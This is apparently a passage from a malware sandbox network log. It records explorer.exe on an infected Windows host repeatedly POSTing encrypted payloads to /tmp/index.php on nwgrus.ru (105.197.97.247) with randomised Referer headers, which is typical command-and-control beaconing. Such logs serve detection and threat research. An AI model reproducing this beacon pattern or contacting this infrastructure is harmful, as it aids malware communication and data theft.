                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        11 | 192.168.2.5 | 49844 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:34.116712093 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://ctxuhanhwfs.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 326
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:34.116729021 CEST | 326 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 44 41 f1 a4
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuDA]\Yz|>)3p]#wEQ6,leR1pdPih;GZ2TvkN6;?sqCVz`d1jir!+
                                        Oct 7, 2024 14:59:35.044061899 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:34 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        12 | 192.168.2.5 | 49850 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:35.054987907 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://ncglteyuwoqfog.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 305
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:35.055008888 CEST | 305 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 7b 24 c3 f1
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu{$lQ]wl1S9*(2K?FJL#@-J4z7\(mk~=!NI$pMM1mqbili1*A
                                        Oct 7, 2024 14:59:35.979567051 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:35 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        13 | 192.168.2.5 | 49856 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:36.406860113 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://uknyifxswcdyll.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 123
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:36.406965017 CEST | 123 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 55 45 dc e4
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuUEJ-}QoiQQtOb^)
                                        Oct 7, 2024 14:59:37.312268972 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:37 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        14 | 192.168.2.5 | 49867 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:37.321669102 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://pxdktwwwgewqlyba.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 247
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:37.321669102 CEST | 247 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 4e 5d d4 af
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuN]lDY]JCfz}am>c;GC#C7!Si_J+<~~dB{!(_z*S=LvlgYRt?X7_jdc
                                        Oct 7, 2024 14:59:38.356266975 CEST | 137 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:38 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        15 | 192.168.2.5 | 49868 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:38.365433931 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://emasrygonyft.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 356
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:38.365433931 CEST | 356 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 7d 05 ba a0
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu}USgyI"|iH"emr[I{`>Q.?]XH-L?KuaB<EA<~Rc"=!u-qZ)Z|9Y7
                                        Oct 7, 2024 14:59:39.268884897 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:39 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        16 | 192.168.2.5 | 49874 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:39.307909012 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://pwvfxidmiqrrd.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 219
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:39.307909012 CEST | 219 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 71 58 ac 8e
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuqX_|eZ$P^[lt~G{j(C80&Ul\C'@6)YNlTG;*\""2w
                                        Oct 7, 2024 14:59:40.231791973 CEST | 137 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:40 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        17 | 192.168.2.5 | 49885 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:40.240510941 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://gcmljhlsnyknod.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 256
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:40.240534067 CEST | 256 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 6e 26 b2 f8
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vun&tGa|@@k1yLW/`D,[`=@,krcY;t6]W&'iEx[RI|ack*AGW4
                                        Oct 7, 2024 14:59:41.191051006 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:41 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        18 | 192.168.2.5 | 49891 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:41.210547924 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://emsfvchaaieje.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 120
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:41.210547924 CEST | 120 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 7c 34 bd 8b
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu|4MMO(ZS#QlVtw
                                        Oct 7, 2024 14:59:42.137079000 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:41 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        19 | 192.168.2.5 | 49897 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:42.146612883 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://goboxcgfexx.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 175
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:42.146632910 CEST | 175 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 5b 40 b1 f7
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu[@}omjJnl#&Rg/+(\"Xh.2!a2pY)]
                                        Oct 7, 2024 14:59:43.084280968 CEST | 137 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:42 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        20 | 192.168.2.5 | 49903 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:43.094247103 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://ruprlmkhoul.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 200
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:43.094276905 CEST | 200 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 52 1d e0 ea
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuRvx=D(X-qoWC(m>NIY+]DYXyE+:Xv:8ihJI
                                        Oct 7, 2024 14:59:44.027868032 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:43 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
